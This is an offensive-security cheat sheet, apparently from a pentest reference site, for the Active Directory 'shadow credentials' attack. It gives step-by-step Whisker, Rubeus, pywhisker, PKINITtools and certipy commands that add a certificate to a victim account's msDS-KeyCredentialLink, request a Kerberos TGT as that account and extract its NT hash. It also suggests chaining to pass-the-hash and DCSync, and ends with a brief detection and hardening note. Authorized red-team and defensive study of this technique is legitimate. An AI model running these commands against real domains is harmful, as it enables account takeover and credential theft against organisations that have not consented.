← All cheat sheets

SHADOW-CREDENTIALS

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Abuse Key Trust (PKINIT) by writing a certificate to a target's
msDS-KeyCredentialLink, then authenticating as them with Kerberos. A stealthy
alternative to resetting passwords. Requires write access to the target object.
Authorized engagements only.

PREREQUISITES#

- GenericWrite / GenericAll / WriteProperty over the target user or computer
  (find via BloodHound: "AddKeyCredentialLink" edge).
- DC running on Server 2016+ with PKINIT (AD CS not strictly required).

WINDOWS (Whisker + Rubeus)#

Whisker.exe add /target:victim$                 # adds a KeyCredential, prints cmd
# Whisker outputs a Rubeus asktgt with the generated cert:
Rubeus.exe asktgt /user:victim$ /certificate:<b64> /password:"<pfxpw>" /ptt
# then act as victim:
Rubeus.exe asktgt /user:victim$ /certificate:... /getcredentials   # also NT hash
Clean up:
Whisker.exe remove /target:victim$ /deviceid:<guid>
Whisker.exe list /target:victim$

LINUX (pywhisker + PKINITtools / certipy)#

pywhisker.py -d corp.local -u attacker -p pass --target victim --action add
# -> outputs a .pfx and its password
# Get a TGT via PKINIT:
gettgtpkinit.py -cert-pfx victim.pfx -pfx-pass <pw> corp.local/victim victim.ccache
export KRB5CCNAME=victim.ccache
# Recover the NT hash from the PAC (U2U):
getnthash.py -key <AS-REP key from gettgtpkinit> corp.local/victim
# certipy all-in-one:
certipy shadow auto -u attacker@corp.local -p pass -account victim

WHY IT'S USEFUL#

- No password reset (less disruptive / noisy than forcechangepassword).
- Yields a usable TGT and often the NT hash (chains to PtH, DCSync if privileged).
- Works on computer accounts (pair with RBCD / coercion).

DETECTION / HARDENING (blue-team note)#

- Monitor changes to msDS-KeyCredentialLink (DS object auditing / 5136).
- Tighten DACLs: remove excessive GenericWrite/GenericAll over Tier-0.
- Enforce strong certificate mapping; review AD CS and Key Trust config.